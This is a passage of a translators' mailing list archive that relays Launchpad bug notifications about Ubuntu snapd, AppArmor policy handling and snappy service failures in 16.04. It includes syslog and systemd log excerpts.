name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhJJq4TueYwFMXoSVrZyfk0E--/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm kernel: audit_printk_skb: 36 callbacks suppressed To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1574556/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1581097] [NEW] click-apparmor does not properly calculate the policy version with 15.10 policy
Public bug reported:
aa-clickhook fails with wily frameworks because of this:
apparmor.easyprof.AppArmorException: "Could not find templates directory
'/usr/share/apparmor/easyprof/templates/ubuntu/15.1'". It is reading the
json 15.10 number for policy version as 15.1.
** Affects: click-apparmor (Ubuntu)
Importance: High
Assignee: Jamie Strandboge (jdstrand)
Status: In Progress
** Affects: click-apparmor (Ubuntu Xenial)
Importance: High
Assignee: Jamie Strandboge (jdstrand)
Status: Triaged
** Affects: click-apparmor (Ubuntu Yakkety)
Importance: High
Assignee: Jamie Strandboge (jdstrand)
Status: In Progress
** Also affects: click-apparmor (Ubuntu Xenial)
Importance: Undecided
Status: New
** Also affects: click-apparmor (Ubuntu Yakkety)
Importance: Undecided
Status: New
** Changed in: click-apparmor (Ubuntu Yakkety)
Status: New => In Progress
** Changed in: click-apparmor (Ubuntu Xenial)
Status: New => Triaged
** Changed in: click-apparmor (Ubuntu Yakkety)
Importance: Undecided => High
** Changed in: click-apparmor (Ubuntu Xenial)
Importance: Undecided => High
** Changed in: click-apparmor (Ubuntu Yakkety)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
** Changed in: click-apparmor (Ubuntu Xenial)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1581097
Title:
click-apparmor does not properly calculate the policy version with
15.10 policy
Status in click-apparmor package in Ubuntu:
In Progress
Status in click-apparmor source package in Xenial:
Triaged
Status in click-apparmor source package in Yakkety:
In Progress
Bug description:
aa-clickhook fails with wily frameworks because of this:
apparmor.easyprof.AppArmorException: "Could not find templates
directory '/usr/share/apparmor/easyprof/templates/ubuntu/15.1'". It is
reading the json 15.10 number for policy version as 15.1.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/click-apparmor/+bug/1581097/+subscriptions
___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1569581] Re: snapd no longer detects apparmor changes on upgrade
Ok, I've added an apparmor task and assigned to me. Leaving the snappy tasks open for "we will re-load all profiles for a specific snap each time something in that snap changes *AND* we promise to detect changes to the internal templates built into snappy" where I understand the first part is done but the changes to internal templates is not. Assigning zyga for the time being-- please adjust as necessary. ** Also affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Changed in: snapd (Ubuntu) Status: New => Triaged ** Changed in: snapd (Ubuntu Xenial) Status: New => Triaged ** Changed in: apparmor (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: apparmor (Ubuntu Xenial) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: apparmor (Ubuntu) Status: New => Triaged ** Changed in: apparmor (Ubuntu Xenial) Status: New => Triaged ** Changed in: snappy Assignee: (unassigned) => Zygmunt Krynicki (zyga) ** Changed in: apparmor (Ubuntu) Importance: Undecided => High ** Changed in: apparmor (Ubuntu Xenial) Importance: Undecided => High -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1569581 Title: snapd no longer detects apparmor changes on upgrade Status in Snappy: Triaged Status in apparmor package in Ubuntu: Triaged Status in snapd package in Ubuntu: Triaged Status in apparmor source package in Xenial: Triaged Status in snapd source package in Xenial: Triaged Bug description: snappy in 16.04 used to compare /usr/share/snappy/security-policy- version and /var/lib/snappy/security-policy-version on boot to see if the apparmor package changed and therefore if it needed to regenerate all snap policy. This functionality was recently removed with nothing added to replace it. snapd must have a means to detect changes to the parser or the abstractions which the snap may #include, otherwise we cannot deliver parser and policy fixes from apparmor to installed snaps. It is fine to use a different method than what we had before, but we need to have something. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1569581/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1574556] Re: apparmor denials reported for encryped HOME
** Also affects: ubuntu-core-launcher (Ubuntu Xenial) Importance: Undecided Status: New -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1574556 Title: apparmor denials reported for encryped HOME Status in Snappy: New Status in ubuntu-core-launcher package in Ubuntu: New Status in ubuntu-core-launcher source package in Xenial: New Bug description: I just did a fresh install of Ubuntu 16.04 with encrypted $HOME. I've installed my links snap and it seems to work but I see odd apparmor denials in syslog: abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhJJq4TueYwFMXoSVrZyfk0E--/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm kernel: audit_printk_skb: 36 callbacks suppressed To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1574556/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1567780] Re: Fails to start snappy-autopilot.service in a default install
** Package changed: snappy (Ubuntu Xenial) => snapd (Ubuntu Xenial) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1567780 Title: Fails to start snappy-autopilot.service in a default install Status in snapd package in Ubuntu: New Status in snapd source package in Xenial: New Bug description: Since snappy is now installed by default on cloud images, it fails to start: ● ubuntu-snappy.boot-ok.service - Notify bootloader that boot was successful Loaded: loaded (/lib/systemd/system/ubuntu-snappy.boot-ok.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Fri 2016-04-08 08:33:05 CEST; 6min ago Process: 938 ExecStart=/usr/bin/snappy booted (code=exited, status=1/FAILURE) Main PID: 938 (code=exited, status=1/FAILURE) Apr 08 08:33:05 autopkgtest systemd[1]: Starting Notify bootloader that boot was successful... Apr 08 08:33:05 autopkgtest snappy[938]: No option snappy_os in section Apr 08 08:33:05 autopkgtest /usr/bin/snappy[938]: main.go:50: DEBUG: [/usr/bin/snappy booted] failed: No option snappy_os in section Apr 08 08:33:05 autopkgtest systemd[1]: ubuntu-snappy.boot-ok.service: Main process exited, code=exited, status=1/FAILURE Apr 08 08:33:05 autopkgtest systemd[1]: Failed to start Notify bootloader that boot was successful. Apr 08 08:33:05 autopkgtest systemd[1]: ubuntu-snappy.boot-ok.service: Unit entered failed state. Apr 08 08:33:05 autopkgtest systemd[1]: ubuntu-snappy.boot-ok.service: Failed with result 'exit-code'. ubuntu-snappy.run-hooks.service - Regenerate snappy security policies Loaded: loaded (/lib/systemd/system/ubuntu-snappy.run-hooks.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Fri 2016-04-08 08:33:04 CEST; 6min ago Process: 596 ExecStart=/bin/sh -c set -ex; if ! cmp /usr/share/snappy/security-policy-version /var/lib/snappy/security-policy-version; then /usr/bin/snappy policygen --regenerate-all; cp /usr/share/snappy/security-policy-version /var/lib/snappy/; fi (code=exited, status=1/FAILURE) Main PID: 596 (code=exited, status=1/FAILURE) Apr 08 08:33:04 autopkgtest systemd[1]: Starting Regenerate snappy security policies... Apr 08 08:33:04 autopkgtest sh[596]: + cmp /usr/share/snappy/security-policy-version /var/lib/snappy/security-policy-version Apr 08 08:33:04 autopkgtest sh[596]: cmp: /usr/share/snappy/security-policy-version: No such file or directory Apr 08 08:33:04 autopkgtest sh[596]: + /usr/bin/snappy policygen --regenerate-all Apr 08 08:33:04 autopkgtest sh[596]: + cp /usr/share/snappy/security-policy-version /var/lib/snappy/ Apr 08 08:33:04 autopkgtest sh[596]: cp: cannot stat '/usr/share/snappy/security-policy-version': No such file or directory Apr 08 08:33:04 autopkgtest systemd[1]: ubuntu-snappy.run-hooks.service: Main process exited, code=exited, status=1/FAILURE Apr 08 08:33:04 autopkgtest systemd[1]: Failed to start Regenerate snappy security policies. Apr 08 08:33:04 autopkgtest systemd[1]: ubuntu-snappy.run-hooks.service: Unit entered failed state. Apr 08 08:33:04 autopkgtest systemd[1]: ubuntu-snappy.run-hooks.service: Failed with result 'exit-code'. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1567780/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
